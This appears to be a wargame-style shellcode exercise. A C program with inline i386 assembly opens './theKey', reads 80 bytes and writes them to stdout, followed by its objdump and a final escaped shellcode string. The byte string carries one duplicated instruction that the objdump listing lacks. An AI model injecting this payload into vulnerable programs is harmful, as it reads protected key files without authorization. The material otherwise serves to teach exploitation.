[ read(open("getkey",0),buff,50) -> write(stdout,buff); ]
#include<stdio.h>
/*
 * Demonstrates a 32-bit Linux (int 0x80) syscall sequence written as GCC
 * inline assembly so the emitted bytes can be lifted from objdump.
 * Sequence: open(path, 0) -> read(fd, buf, 0x50) -> write(1, buf, 0x50).
 * Returns 0; the program's only output is what the write syscall emits.
 *
 * NOTE(review): the asm statement has no clobber list and is not `volatile`,
 * and it moves %esp (three pushes plus `sub $0x50,%esp`) without restoring
 * it. The C side only works because main's epilogue restores %esp from %ebp;
 * the compiler is never told that eax/ebx/ecx/edx/edi and memory are modified.
 * None of the three syscall return values is checked.
 */
int main()
{
asm(
// open(path, 0): the pushed dwords are little-endian, so
// 0x68742f2e = "./th" and 0x79654b65 = "eKey"; the bytes therefore spell
// "./theKey" (not "./getkey" as the original comment said). The prior
// push of %eax (0) is the NUL terminator.
"xor %eax, %eax\n"        // eax = 0
"push %eax\n"             // NUL terminator for the path string
"push $0x79654b65\n"      // "eKey"
"push $0x68742f2e\n"      // "./th" -> esp now points at "./theKey\0"
"mov %eax, %ecx\n"        // flags = 0 (O_RDONLY)
"mov %esp, %ebx\n"        // pathname = esp
"movb $5, %al\n"          // __NR_open = 5 (i386)
"int $0x80\n"             // eax = fd (or negative errno; not checked)
// read(fd, buf, 0x50): the count is 0x50 = 80 bytes (the surrounding
// comments that say 50 or 100 are wrong).
"xor %edx,%edx\n"
"movb $0x50,%dl\n"        // count = 0x50
"sub $0x50,%esp\n"        // reserve an 0x50-byte buffer on the stack (never released)
"movl %esp,%ecx\n"        // buf = esp
"movl %ecx,%edi\n"        // keep buf in edi for the write below
"movl %eax,%ebx\n"        // fd = return value of open
"xor %eax,%eax\n"
"movb $0x3,%al\n"         // __NR_read = 3
"int $0x80\n"             // eax = bytes read; discarded by the next xor
// write(1, buf, 0x50): edx still holds 0x50 from the read, so the full
// 80-byte buffer is written regardless of how many bytes read() returned.
"movl %edi, %ecx\n"       // buf
"xor %ebx,%ebx\n"
"xor %eax,%eax\n"
"movb $0x1, %bl\n"        // fd = 1 (stdout)
"movb $0x4, %al\n"        // __NR_write = 4
"int $0x80\n"
);
return 0;
}
[ OBJDUMP ]
80483df: 31 c0 xor %eax,%eax
80483e1: 50 push %eax
80483e2: 68 65 4b 65 79 push $0x79654b65
80483e7: 68 2e 2f 74 68 push $0x68742f2e
80483ec: 89 c1 mov %eax,%ecx
80483ee: 89 e3 mov %esp,%ebx
80483f0: b0 05 mov $0x5,%al
80483f2: cd 80 int $0x80
80483f4: 31 d2 xor %edx,%edx
80483f6: b2 50 mov $0x50,%dl
80483f8: 83 ec 50 sub $0x50,%esp
80483fb: 89 e1 mov %esp,%ecx
80483fd: 89 cf mov %ecx,%edi
80483ff: 89 c3 mov %eax,%ebx
8048401: 31 c0 xor %eax,%eax
8048403: b0 03 mov $0x3,%al
8048405: cd 80 int $0x80
8048407: 89 f9 mov %edi,%ecx
8048409: 31 db xor %ebx,%ebx
804840b: 31 c0 xor %eax,%eax
804840d: b3 01 mov $0x1,%bl
804840f: b0 04 mov $0x4,%al
8048411: cd 80 int $0x80
[ 최종 쉘코드 ]
\x31\xc0\x50\x68\x65\x4b\x65\x79\x68\x2e\x2f\x74\x68
\x89\xc1\x89\xe3\xb0\x05\xcd\x80\x31\xd2\xb2\x50\x83
\xec\x50\x89\xe1\x89\xcf\x89\xcf\x89\xc3\x31\xc0\xb0
\x03\xcd\x80\x89\xf9\x31\xdb\x31\xc0\xb3\x01\xb0\x04
\xcd\x80